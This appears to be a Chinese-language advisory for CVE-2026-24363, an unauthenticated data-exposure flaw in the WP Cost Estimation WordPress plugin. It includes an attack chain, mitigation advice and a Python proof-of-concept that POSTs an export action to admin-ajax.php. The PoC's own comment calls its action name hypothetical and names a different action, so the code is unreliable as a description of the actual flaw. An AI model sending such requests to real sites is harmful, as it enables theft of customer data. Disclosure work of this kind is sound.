CVE-2026-24363 CVSS 7.5 高危

CVE-2026-24363 WP Cost Estimation权限绕过

披露日期: 2026-03-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-24363

漏洞类型

权限绕过

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WP Cost Estimation & Payment Forms Builder

漏洞概述

WP Cost Estimation & Payment Forms Builder 插件存在缺失授权漏洞。由于未正确配置访问控制安全级别，未授权攻击者可利用该漏洞远程获取敏感信息。此问题影响所有低于 10.3.0 的版本，攻击无需用户交互或认证，机密性影响较高。

技术细节

该漏洞的核心在于插件在处理特定 AJAX 请求或 API 调用时，未实施有效的身份验证和授权检查机制。攻击者可向 `wp-admin/admin-ajax.php` 或插件特定的 REST API 路由发送恶意请求。由于 CVSS 向量显示 PR:N（无需认证），表明插件将本应受限的敏感功能直接暴露给了匿名用户。攻击者无需登录即可构造特定的数据包，触发插件内部的处理函数。这种利用方式利用了 WordPress 插件开发中常见的 `wp_ajax_nopriv_` 钩子误用或权限校验缺失，从而导致高机密性数据（C:H）的泄露。

攻击链分析

STEP 1

侦察

攻击者扫描目标 WordPress 站点，识别是否安装了 WP Cost Estimation & Payment Forms Builder 插件。

STEP 2

版本确认

通过源码、Readme 文件或 HTTP 响应头确认插件版本是否低于 10.3.0。

STEP 3

漏洞利用

攻击者向 `/wp-admin/admin-ajax.php` 发送特制的 POST 请求，触发未授权的敏感功能。

STEP 4

数据获取

服务器返回由于访问控制缺失而泄露的敏感数据（如估价表单数据、客户信息等）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_vulnerability(target_url):
    """
    Proof of Concept for CVE-2026-24363
    Checks for missing authorization on sensitive endpoints.
    """
    # The vulnerable endpoint is typically an AJAX action
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Example payload based on typical plugin structure
    # Specific action name 'lhf_save_form' is hypothetical for this CVE structure
    payload = {
        "action": "lhf_export_data", 
        "id": "1"
    }

    try:
        response = requests.post(ajax_url, data=payload, timeout=10)
        
        # Check if response contains sensitive data or successful export indicators
        if response.status_code == 200 and ("form_data" in response.text or "success" in response.text):
            print(f"[+] Potential Vulnerability Detected at {target_url}")
            print(f"[+] Response: {response.text[:100]}...")
        else:
            print(f"[-] Target does not appear vulnerable or endpoint is inactive.")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    target = "http://example.com" # Replace with target
    check_vulnerability(target)

影响范围

WP Cost Estimation & Payment Forms Builder < 10.3.0

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用 WP Cost Estimation & Payment Forms Builder 插件，直到应用安全补丁。同时检查站点日志以确认是否已有数据泄露行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表